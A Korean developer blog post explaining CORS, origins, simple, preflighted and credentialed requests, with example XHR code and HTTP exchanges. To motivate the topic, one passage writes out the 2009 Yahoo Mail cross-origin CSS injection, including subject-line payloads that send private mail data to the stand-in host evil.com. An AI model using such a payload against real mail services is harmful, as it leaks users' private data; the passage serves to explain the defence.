CORS ๋ž€?

hyeongjundevยท2022๋…„ 3์›” 12์ผ
0

reference

๋ชฉ๋ก ๋ณด๊ธฐ
3/4

๐Ÿšจ Access to fetch at โ€˜https://api.lubycon.com/meโ€™ from origin โ€˜http://localhost:3000โ€™ has been blocked by CORS policy: No โ€˜Access-Control-Allow-Originโ€™ header is present on the requested resource. If an opaque response serves your needs, set the requestโ€™s mode to โ€˜no-corsโ€™ to fetch the resource with CORS disabled.

๊ฐœ๋ฐœ์„ ํ•˜๋‹ค๋ณด๋ฉด ํ•œ๋ฒˆ์ฏค ๋งˆ์ฃผ์ณค์„ ๋ฉ”์‹œ์ง€ ์ž…๋‹ˆ๋‹ค.
CORS๋ฅผ ์œ„๋ฐ˜ํ–ˆ๊ณ , 'Access-Control-Allow-Origin' ํ—ค๋”๋ฅผ ์ˆ˜์ •ํ•˜๊ฑฐ๋‚˜ cors๊ฐ€ ํ•„์š”์—†๋Š” ์š”์ฒญ์„ ํ•˜๋ผ๋Š” ํ•ด๊ฒฐ๋ฐฉ๋ฒ•์„ ์•Œ๋ ค์ฃผ๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค.

์—ฌ๊ธฐ์„œ CORS๋Š” ๋ฌด์—‡์ผ๊นŒ์š”?

๊ฐœ๋…์„ ์ดํ•ดํ•˜๋Š” ๋ฐฉ๋ฒ• ์ค‘ ๊ฐ€์žฅ ์ข‹์€ ๋ฐฉ๋ฒ•์€ ์™œ ์ด ๊ฐœ๋…์ด ์ƒ๊ฒผ๋Š”์ง€ ์•Œ์•„๋ณด๋Š”๊ฒŒ ์ข‹์Šต๋‹ˆ๋‹ค.

์™œ CORS๊ฐ€ ์ƒ๊ฒผ์„๊นŒ?

๋ธŒ๋ผ์šฐ์ €๋Š” ๊ฑฐ์˜ 30๋…„ ๋™์•ˆ ๋‹ค๋ฅธ ์‚ฌ์ดํŠธ์˜ ์ด๋ฏธ์ง€๋ฅผ ํฌํ•จํ•  ์ˆ˜ ์žˆ์—ˆ์Šต๋‹ˆ๋‹ค. ๋‹ค๋ฅธ ์‚ฌ์ดํŠธ์˜ ํ—ˆ๋ฝ์„ ๋ฐ›์„ ํ•„์š” ์—†์ด ๊ทธ๋ƒฅ ํ•  ์ˆ˜ ์žˆ์—ˆ์Šต๋‹ˆ๋‹ค. ์ด๋ฏธ์ง€๋ฟ๋งŒ ์•„๋‹ˆ๋ผ ๋‹ค๋ฅธ ์ž์›๋„ ๊ฐ€์ ธ์˜ค๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅํ–ˆ์Šต๋‹ˆ๋‹ค.

<script src="โ€ฆ"></script>
<link rel="stylesheet" href="โ€ฆ" />
<iframe src="โ€ฆ"></iframe>
<video src="โ€ฆ"></video>
<audio src="โ€ฆ"></audio>

ํ•˜์ง€๋งŒ ์ด๋Ÿฐ ๋ฐฉ์‹์€ 1994๋…„์— HTTP ์ฟ ํ‚ค ๋“ฑ์žฅ์œผ๋กœ ๋ณต์žกํ•ด์ง€๊ธฐ ์‹œ์ž‘ํ–ˆ์Šต๋‹ˆ๋‹ค. HTTP ํ—ค๋”์— ์ธ์ฆ ์ •๋ณด๊ฐ€ ํฌํ•จ์ด ๋˜์—ˆ๊ธฐ ๋•Œ๋ฌธ์ž…๋‹ˆ๋‹ค.

์„œ๋ฒ„๋Š” HTTP ํ—ค๋”์˜ ์ธ์ฆ ์ •๋ณด๋ฅผ ์‚ฌ์šฉํ•ด์„œ ์‚ฌ์šฉ์ž๋ฅผ ํŠน์ •ํ•ฉ๋‹ˆ๋‹ค.

๊ณต๊ฒฉ์ž๋Š” ์ด๋Ÿฐ ํŠน์ •์„ ์ด์šฉํ•ด์„œ ์ทจ์•ฝ์ ์„ ์ฐพ๊ธฐ ์‹œ์ž‘ํ–ˆ์Šต๋‹ˆ๋‹ค. ๊ฒฐ๊ณผ์ ์œผ๋กœ, 2009๋…„ ์•ผํ›„ ๋ฉ”์ผ์˜ ์ทจ์•ฝ์ ์ด ๋ฐํ˜€์กŒ์Šต๋‹ˆ๋‹ค.

๋จผ์ €, ๊ณต๊ฒฉ์ž๋Š” ');}๋ฅผ ํฌํ•จํ•œ ์ œ๋ชฉ์„ ์œ ์ €๊ฒŒ ๋ณด๋‚ธ ํ›„ {}html{background:url('//evil.com/?:๊ฐ€ ํฌํ•จ๋œ ์ œ๋ชฉ์˜ ๋ฉ”์ผ์„ ๋ณด๋ƒ…๋‹ˆ๋‹ค.

๊ทธ๋Ÿผ, ๋ฉ”์ผ์ด ์•„๋ž˜์™€ ๊ฐ™์€ ๊ตฌ์กฐ๋กœ ์ „๋‹ฌ๋  ๊ฒƒ ์ž…๋‹ˆ๋‹ค.

โ€ฆ
<li class="email-subject">Hey {}html{background:url('//evil.com/?</li>
<li class="email-subject">โ€ฆprivate dataโ€ฆ</li>
<li class="email-subject">โ€ฆprivate dataโ€ฆ</li>
<li class="email-subject">โ€ฆprivate dataโ€ฆ</li>
<li class="email-subject">Yo ');}</li>
โ€ฆ

์œ„ ๊ตฌ์กฐ์—์„œ ๊ณต๊ฒฉ์ž๊ฐ€ ์‹คํ–‰๋˜๊ธฐ ์›ํ•˜๋Š” ์ฝ”๋“œ๋Š” ์œ ํšจํ•œ CSS ๊ตฌ๋ฌธ ๋ถ„์„ ๋Œ€์ƒ ์‚ฌ์ด์— ๋ผ์–ด ์žˆ์Šต๋‹ˆ๋‹ค.

๋‹ค์Œ์— ๊ณต๊ฒฉ์ž๋Š” ์‚ฌ์šฉ์ž๊ฐ€ ๋‹ค์Œ์„ ํฌํ•จํ•˜๋Š” ํŽ˜์ด์ง€๋ฅผ ๋ฐฉ๋ฌธ ํ•˜๋„๋ก ์œ ๋„ํ•ฉ๋‹ˆ๋‹ค.

<link rel="stylesheet" href="https://m.yahoo.com/mail" />

ํ•ด๋‹น ์ž์›์ด yahoo.com์˜ ์ฟ ํ‚ค๋ฅผ ์ด์šฉํ•ด ๋กœ๋“œ๋˜๋ฉด CSS ํŒŒ์„œ๋Š” ๋ฏธ๋ฆฌ ์‹ฌ์–ด๋‘์—ˆ๋˜ ๋ฉ”์ผ ์ œ๋ชฉ์„ ๊ตฌ๋ฌธ ๋ถ„์„ํ•˜์—ฌ ๊ฐœ์ธ ์ •๋ณด๋ฅผ evil.com์— ๋ณด๋‚ด๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

์„œ๋กœ ๋‹ค๋ฅธ ์‚ฌ์ดํŠธ์— ์ ‘๊ทผ์„ ํ—ˆ์šฉํ–ˆ์„ ๋•Œ ๋ฐœ์ƒํ•  ์ˆ˜ ์žˆ๋Š” ๋ฌธ์ œ๋Š” ์ด๊ฒƒ ๋ง๊ณ ๋„ ๋‹ค์–‘ํ•ฉ๋‹ˆ๋‹ค.

๊ทธ๋ž˜์„œ CORS ๋ž€?

์œ„์—์„œ ์„œ๋กœ ๋‹ค๋ฅธ ์‚ฌ์ดํŠธ์— ์ ‘๊ทผ์„ ํ—ˆ์šฉํ–ˆ์„ ๋•Œ ๋ฌธ์ œ๊ฐ€ ๋ฐœ์ƒํ•œ๋‹ค๋Š” ๊ฒƒ์„ ์•Œ๊ฒŒ ๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฐ ๋ฌธ์ œ๋ฅผ ํ•ด๊ฒฐํ•˜๊ธฐ ์œ„ํ•œ ๋ฐฉ๋ฒ• ์ค‘ ํ•˜๋‚˜๊ฐ€ CORS ์ž…๋‹ˆ๋‹ค.

CORS์˜ ์ •์˜๋Š” ์•„๋ž˜์™€ ๊ฐ™์Šต๋‹ˆ๋‹ค.

๊ต์ฐจ ์ถœ์ฒ˜ ๋ฆฌ์†Œ์Šค ๊ณต์œ (Cross-Origin Resource Sharing, CORS)๋Š” ์ถ”๊ฐ€ HTTP ํ—ค๋”๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ, ํ•œ ์ถœ์ฒ˜์—์„œ ์‹คํ–‰ ์ค‘์ธ ์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์ด ๋‹ค๋ฅธ ์ถœ์ฒ˜์˜ ์„ ํƒํ•œ ์ž์›์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ๋Š” ๊ถŒํ•œ์„ ๋ถ€์—ฌํ•˜๋„๋ก ๋ธŒ๋ผ์šฐ์ €์— ์•Œ๋ ค์ฃผ๋Š” ์ฒด์ œ์ž…๋‹ˆ๋‹ค.

๊ฐ„๋‹จํžˆ ์ด์•ผ๊ธฐํ•˜๋ฉด CORS๋Š” ๋ธŒ๋ผ์šฐ์ €์—์„œ๋งŒ ์‚ฌ์šฉ ๋˜๋ฉฐ, ๊ฐ™์€ ์ถœ์ฒ˜์™€ ์„œ๋ฒ„๊ฐ€ ํ—ˆ์šฉํ•ด์ค€ ์ถœ์ฒ˜๋งŒ์ด ์ž์›์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•˜๋Š” ์ •์ฑ…์ž…๋‹ˆ๋‹ค.

์ถœ์ฒ˜(Origin)?

์ถœ์ฒ˜๋ผ๋Š” ์šฉ์–ด๊ฐ€ ๋งŽ์ด ๋‚˜์˜ต๋‹ˆ๋‹ค. ์ถœ์ฒ˜๋Š” ๋ฌด์—‡์ผ๊นŒ์š”?

www.google.com๊ฐ™์€ ์šฐ๋ฆฌ๊ฐ€ ํ”ํžˆ ๋ณด๋Š” URL์€ ์—ฌ๋Ÿฌ๊ฐœ์˜ ์ปดํฌ๋„ŒํŠธ๋กœ ์ด๋ฃจ์–ด์ ธ์žˆ์Šต๋‹ˆ๋‹ค.

์ถœ์ฒ˜๋Š” ์œ„์˜ ๊ตฌ์กฐ์—์„œ scheme๊ณผ host, port๋ฅผ ํ•ฉ์นœ ๊ฒƒ์„ ์˜๋ฏธ ํ•ฉ๋‹ˆ๋‹ค.
https://evan-moon.github.io์™€ ๊ฐ™์€ ์ถœ์ฒ˜๋Š” ์ธ์ •๋˜๋Š” ์˜ˆ์‹œ๋Š” ์•„๋ž˜์™€ ๊ฐ™์Šต๋‹ˆ๋‹ค.

URL๊ฐ™์€ ์ถœ์ฒ˜์ด์œ 
https://evan-moon.github.io/aboutO์Šคํ‚ด, ํ˜ธ์ŠคํŠธ, ํฌํŠธ๊ฐ€ ๋™์ผ
https://evan-moon.github.io/about?q=์•ˆ๋‡ฝO์Šคํ‚ด, ํ˜ธ์ŠคํŠธ, ํฌํŠธ๊ฐ€ ๋™์ผ
https://user:password@evan-moon.github.ioO์Šคํ‚ด, ํ˜ธ์ŠคํŠธ, ํฌํŠธ๊ฐ€ ๋™์ผ
http://evan-moon.github.ioX์Šคํ‚ด์ด ๋‹ค๋ฆ„
https://api.github.ioXํ˜ธ์ŠคํŠธ๊ฐ€ ๋‹ค๋ฆ„
https://evan-moon.naver.comXํ˜ธ์ŠคํŠธ๊ฐ€ ๋‹ค๋ฆ„
https://evan-moon.github.comXํ˜ธ์ŠคํŠธ๊ฐ€ ๋‹ค๋ฆ„
https://evan-moon.github.io:8000?๋ธŒ๋ผ์šฐ์ €์˜ ๊ตฌํ˜„์— ๋”ฐ๋ผ ๋‹ค๋ฆ„

์–ธ์ œ, ์–ด๋–ป๊ฒŒ CORS๊ฐ€ ์‚ฌ์šฉ๋˜๋‚˜?

๊ทธ๋ž˜์„œ CORS๋Š” ์–ธ์ œ, ์–ด๋–ป๊ฒŒ ์‚ฌ์šฉ์ด ๋ ๊นŒ์š”?

CORS๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ์š”์ฒญ

์•„๋ž˜ HTTP ์š”์ฒญ์— ๋Œ€ํ•ด์„œ CORS๋Š” ๋™์ž‘ํ•ฉ๋‹ˆ๋‹ค.

  • XMLHttpRequest๋‚˜ Fetch APIs๋ฅผ ํ˜ธ์ถœํ•˜๋Š” ๊ฒฝ์šฐ
  • Web Fonts์˜ ๊ฒฝ์šฐ
  • WebGL textures์˜ ๊ฒฝ์šฐ
  • drawImage()๋ฅผ ์‚ฌ์šฉํ•ด canvas์— Image/Video ํ”„๋ ˆ์ž„์„ ๊ทธ๋ฆฌ๋Š” ๊ฒฝ์šฐ
  • CSS Shaped from images์˜ ๊ฒฝ์šฐ

CORS ์‹œ๋‚˜๋ฆฌ์˜ค

CORS์™€ ๊ด€๋ จ๋œ ์‹œ๋‚˜๋ฆฌ์˜ค๋Š” ์ด 3๊ฐ€์ง€๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค.

Simple Request

ํŠน์ • ์กฐ๊ฑด์„ ๊ฐ€์ง„ ์š”์ฒญ์€ CORS๊ฐ€ ํ•„์š”ํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ์ด ์š”์ฒญ์„ ์šฐ๋ฆฌ๋Š” Simple Request๋ผ๊ณ  ๋ถ€๋ฆ…๋‹ˆ๋‹ค.

Simple Request์˜ ์กฐ๊ฑด์€ ์•„๋ž˜์™€ ๊ฐ™์Šต๋‹ˆ๋‹ค.

  • GET, HEAD, POST ๋ฐฉ๋ฒ• ์ค‘ ํ•˜๋‚˜
  • user agent์— ์˜ํ•ด์„œ ์ž๋™์œผ๋กœ ์„ค์ •๋˜๋Š” ํ—ค๋” ์™ธ์— manually๋กœ ์„ค์ •ํ•  ์ˆ˜ ์žˆ๋Š” ํ—ค๋”๋Š” ์•„๋ž˜์™€ ๊ฐ™์Šต๋‹ˆ๋‹ค.
    • Accept, Accept-Language, Content-Language, Content-Type
  • ํ—ˆ์šฉ๋˜๋Š” media type์€ ์•„๋ž˜์™€ ๊ฐ™์Šต๋‹ˆ๋‹ค.
    • applicatoin/x-www-form-urlencoded, multipart/form-data, text/plain
  • ๋งŒ์•ฝ ์š”์ฒญ์ด XMLHttpRequest๋กœ ์˜ํ•ด ๋งŒ๋“ค์–ด์กŒ๋‹ค๋ฉด, ์ด๋ฒคํŠธ ๋ฆฌ์Šค๋„ˆ๊ฐ€ ๋“ฑ๋ก๋˜์–ด ์žˆ์ง€ ์•Š์•„์•ผ ํ•ฉ๋‹ˆ๋‹ค.
  • ReadableStream ๊ฐ์ฒด๋ฅผ request์—์„œ ์‚ฌ์šฉํ•˜๋ฉด ์•ˆ๋ฉ๋‹ˆ๋‹ค.
const xhr = new XMLHttpRequest();
const url = 'https://bar.other/resources/public-data/';

xhr.open('GET', url);
xhr.onreadystatechange = someHandler;
xhr.send();
GET /resources/public-data/ HTTP/1.1
Host: bar.other
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Connection: keep-alive
Origin: https://foo.example

Preflighted requests

simple request์™€ ๋‹ฌ๋ฆฌ ๋ณธ ์š”์ฒญ ์ „์— OPTIONS ๋ฐฉ๋ฒ•์„ ์‚ฌ์šฉํ•˜์—ฌ HTTP ์š”์ฒญ์„ ๋ณด๋‚ด ๋ณธ ์š”์ฒญ์ด ์•ˆ์ „ํ•˜์ง€ ํ™•์ธ ํ•ฉ๋‹ˆ๋‹ค.

const xhr = new XMLHttpRequest();
xhr.open('POST', 'https://bar.other/resources/post-here/');
xhr.setRequestHeader('X-PINGOTHER', 'pingpong');
xhr.setRequestHeader('Content-Type', 'application/xml');
xhr.onreadystatechange = handler;
xhr.send('<person><name>Arun</name></person>');
OPTIONS /doc HTTP/1.1
Host: bar.other
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Connection: keep-alive
Origin: https://foo.example
Access-Control-Request-Method: POST
Access-Control-Request-Headers: X-PINGOTHER, Content-Type

HTTP/1.1 204 No Content
Date: Mon, 01 Dec 2008 01:15:39 GMT
Server: Apache/2
Access-Control-Allow-Origin: https://foo.example
Access-Control-Allow-Methods: POST, GET, OPTIONS
Access-Control-Allow-Headers: X-PINGOTHER, Content-Type
Access-Control-Max-Age: 86400
Vary: Accept-Encoding, Origin
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive

line 1-10์€ preflight request๋ฅผ ์ด์•ผ๊ธฐ ํ•ฉ๋‹ˆ๋‹ค. ๋ธŒ๋ผ์šฐ์ €๋Š” preflight๋ฅผ ํ†ตํ•ด์„œ ๋ณธ ์š”์ฒญ์ด ๊ฐ€๋Šฅํ•œ์ง€ ํ™•์ธ ํ•ฉ๋‹ˆ๋‹ค. preflight๋Š” ๋ณธ ์š”์ฒญ์— ํ•„์š”ํ•œ ์ •๋ณด๋„ ๋ฏธ๋ฆฌ ๋ณด๋ƒ…๋‹ˆ๋‹ค. 9-10 ๋ผ์ธ

Access-Control-Request-Method ๋Š” ๋ฉ”์†Œ๋“œ๋ฅผ Access-Control-Request-Header๋Š” ๋ณธ ์š”์ฒญ์— ์ปค์Šคํ…€ ํ—ค๋”์— ๋Œ€ํ•œ ์ •๋ณด๊ฐ€ ํฌํ•จ๋ฉ๋‹ˆ๋‹ค.

line 13-22๋Š” ์„œ๋ฒ„๊ฐ€ ์ „๋‹ฌํ•ด์ค€ response ์ž…๋‹ˆ๋‹ค. Access-Control-Allow-Origin์—๋Š” https://foo.examlple์ด ํฌํ•จ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค.

Access-Control-*์— ๋Œ€ํ•œ ์„ค๋ช…

๋ณธ ์š”์ฒญ์— ๋Œ€ํ•œ request์™€ response๋Š” ์•„๋ž˜์™€ ๊ฐ™๋‹ค.

POST /doc HTTP/1.1
Host: bar.other
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Connection: keep-alive
X-PINGOTHER: pingpong
Content-Type: text/xml; charset=UTF-8
Referer: https://foo.example/examples/preflightInvocation.html
Content-Length: 55
Origin: https://foo.example
Pragma: no-cache
Cache-Control: no-cache

<person><name>Arun</name></person>

HTTP/1.1 200 OK
Date: Mon, 01 Dec 2008 01:15:40 GMT
Server: Apache/2
Access-Control-Allow-Origin: https://foo.example
Vary: Accept-Encoding, Origin
Content-Encoding: gzip
Content-Length: 235
Keep-Alive: timeout=2, max=99
Connection: Keep-Alive
Content-Type: text/plain

[Some XML payload]

Requests with credentials

์ธ์ฆ์ •๋ณด๋ฅผ ํฌํ•จํ•˜๋Š” ์š”์ฒญ์€ CORS๋ฅผ ๋” ๊ฐ•ํ™”ํ•œ ์š”์ฒญ์ž…๋‹ˆ๋‹ค.

๊ธฐ๋ณธ์ ์œผ๋กœ ๋ธŒ๋ผ์šฐ์ €๊ฐ€ ์ œ๊ณตํ•˜๋Š” AJAX API์ธ XMLHttpRequst ๊ฐ์ฒด๋‚˜ fetch API๋Š” ์ฟ ํ‚ค ์ •๋ณด๋‚˜ ์ธ์ฆ๊ณผ ๊ด€๋ จ๋œ ํ—ค๋”๋ฅผ ์š”์ฒญ์— ํฌํ•จํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ์ด๋•Œ ์š”์ฒญ์— ์ธ์ฆ๊ณผ ๊ด€๋ จ๋œ ์ •๋ณด๋ฅผ ๋‹ด์„ ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ฃผ๋Š” ์˜ต์…˜์ด credntials์˜ต์…˜ ์ž…๋‹ˆ๋‹ค.

const invocation = new XMLHttpRequest();
const url = 'http://bar.other/resources/credentialed-content/';

function callOtherDomain() {
  if (invocation) {
    invocation.open('GET', url, true);
    invocation.withCredentials = true;
    invocation.onreadystatechange = handler;
    invocation.send();
  }
}

invocatoin.withCredentials๋Š” ์ธ์ฆ ์ •๋ณด๋ฅผ ์ฟ ํ‚ค์— ํฌํ•จํ•œ๋‹ค๋Š” ํ”Œ๋ž˜๊ทธ ์ž…๋‹ˆ๋‹ค. ์œ„ ์š”์ฒญ์€ simple request ์ด์ง€๋งŒ ๋ธŒ๋ผ์šฐ์ €๋Š” Access-Control-Allow-Credentials : true ํ—ค๋”๊ฐ€ ์—†๋Š” ์‘๋‹ต์„ ๊ฑฐ๋ถ€ํ•ฉ๋‹ˆ๋‹ค.

GET /resources/credentialed-content/ HTTP/1.1
Host: bar.other
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Connection: keep-alive
Referer: http://foo.example/examples/credential.html
Origin: http://foo.example
Cookie: pageAccess=2


HTTP/1.1 200 OK
Date: Mon, 01 Dec 2008 01:34:52 GMT
Server: Apache/2
Access-Control-Allow-Origin: https://foo.example
Access-Control-Allow-Credentials: true
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: pageAccess=3; expires=Wed, 31-Dec-2008 01:34:53 GMT
Vary: Accept-Encoding, Origin
Content-Encoding: gzip
Content-Length: 106
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/plain


[text/plain payload]

์ฐธ๊ณ ์ž๋ฃŒ

0๊ฐœ์˜ ๋Œ“๊ธ€